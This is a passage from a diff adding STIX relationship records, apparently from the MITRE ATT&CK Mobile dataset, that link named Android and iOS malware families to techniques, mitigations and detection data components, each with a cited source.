+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4ff5f854-bfe9-45bc-b11a-196cf826b760", + "created": "2022-03-30T14:41:20.735Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Changes to System Broadcasts", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 8 introduced additional limitations on the implicit intents that an application can register for.(Citation: Android Changes to System Broadcasts)", + "modified": "2022-03-30T14:41:20.735Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2b0f4c1d-8d99-4e80-8555-d9a454d5cab7", + "created": "2023-03-20T18:55:33.546Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:33.546Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--29dc105c-0b1b-4645-85ef-436c096bd3e2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:24:38.256Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) uploads incoming SMS messages to a remote command and control server.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4ad83f33-c64a-4ad6-ab6f-0548c9dde257", + "type": "relationship", + "created": "2020-10-29T17:48:27.469Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T17:48:27.469Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can forward SMS messages.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--14143e21-51bf-4fa7-a949-d22a8271f590", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.780Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can record audio using the device microphone.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--91831379-b0da-4019-a7bb-17e53cda9d0b", + "type": "relationship", + "created": "2020-12-31T18:25:05.131Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.131Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has utilized native code to decrypt its malicious payload.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--706c698c-aa8d-4fac-a6c1-2e047c3f965c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Original samples of [BrainTest](https://attack.mitre.org/software/S0293) download their exploit packs for rooting from a remote server after installation.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1417d832-3fa5-4a87-a40b-5ca2d4ee5d1c", + "created": "2022-04-01T14:59:39.294Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Apple regularly provides security updates for known OS vulnerabilities.", + "modified": "2022-04-01T14:59:39.294Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6a5f151f-36cb-496a-9d0c-d726f1b00d4e", + "created": "2023-03-16T18:26:45.940Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:26:45.940Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cc4ae06f-0258-4fe9-b63a-334d283e766d", + "type": "relationship", + "created": "2021-02-08T16:36:20.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.495Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has encrypted application strings using AES in ECB mode and Blowfish, and stored strings encoded in hex during Operation BULL. Further, in Operation BULL, encryption keys were stored within the application’s launcher icon file.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be17dc63-5b0a-491a-be5f-132058444c3a", + "type": "relationship", + "created": "2019-08-09T17:52:13.352Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.877Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) has the ability to take pictures using the device camera.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c49bae52-63b4-4e5e-adfd-65a0e852ed76", + "created": "2023-03-20T18:42:18.058Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:42:18.058Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--33857221-2543-4a7f-8255-b0d140d70ad7", + "type": "relationship", + "created": "2020-07-20T13:27:33.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.686Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can record call audio.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cdb9788e-7d16-482e-92b6-cbde0b3de357", + "type": "relationship", + "created": "2020-12-17T20:15:22.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.408Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can track the device’s location.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--98dec4bf-6753-4d7a-8983-d4fd6d1d892a", + "created": "2020-11-20T16:37:28.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:52:20.309Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect the device’s contact list.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b8a9c44-c8a4-4f30-a3d8-a23310f6c090", + "created": "2023-03-20T18:58:30.773Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:30.773Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--72a88d43-4144-444e-8f71-ac0d19ae3710", + "type": "relationship", + "created": "2020-09-14T14:13:45.256Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.256Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can track the device’s location.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c2536a3c-bb84-42b7-8ac6-05f26205a4ad", + "created": "2021-10-01T14:42:49.159Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can utilize the device’s sensors to determine when the device is in use and subsequently hide malicious activity. When active, it attempts to hide its malicious activity by turning the screen’s brightness as low as possible and muting the device.(Citation: SecureList BusyGasper)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0d0541d-caeb-43c0-906c-2e1e2ec25f69", + "created": "2019-10-14T19:14:18.673Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Group IB Gustuff Mar 2019", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.", + "url": "https://www.group-ib.com/blog/gustuff" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:32:47.359Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) hides its icon after installation.(Citation: Group IB Gustuff Mar 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--43eeee7f-339a-4f6e-9df3-ccbf08ecf358", + "type": "relationship", + "created": "2020-11-10T17:08:35.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-01T19:48:44.840Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has looked for specific applications, such as MiCode.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c89f8f8d-222b-4b83-9fa4-47fd716a271f", + "created": "2020-06-26T15:12:40.100Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020.", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:00.042Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) abuses the accessibility service to auto-start the malware on device boot. This is accomplished by receiving the `android.accessibilityservice.AccessibilityService` intent.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e3a961ec-8184-4143-b8c2-c33ea0503678", + "type": "relationship", + "created": "2020-09-24T15:34:51.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.315Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can take photos and record videos.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3d65c2b7-c907-45e1-b942-95f7d765e749", + "created": "2023-03-20T18:53:34.056Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:34.056Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d1b46d5-cc2e-4312-adf2-43fb130a506b", + "created": "2021-02-17T20:49:24.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:22:40.300Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) can run arbitrary shell commands.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c61c16a9-8d1a-4329-b784-ba71f8421b33", + "created": "2023-03-20T19:00:09.608Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T19:00:09.608Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7b3fa5cb-bd70-47e0-acfb-7db99e29e70f", + "created": "2022-04-01T18:49:19.284Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent versions of Android modified how device administrator applications are uninstalled, making it easier for the user to remove them. Android 7 introduced updates that revoke standard device administrators’ ability to reset the device’s passcode.", + "modified": "2022-04-01T18:49:19.284Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd1e016a-1ebb-4f30-9342-998f656dd8b8", + "created": "2022-04-15T15:57:32.958Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:49.009Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can enable app installation from unknown sources.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17adf4c2-e278-41fc-9183-cda5c8b74de7", + "created": "2022-03-31T19:53:01.320Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-31T19:53:01.320Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + 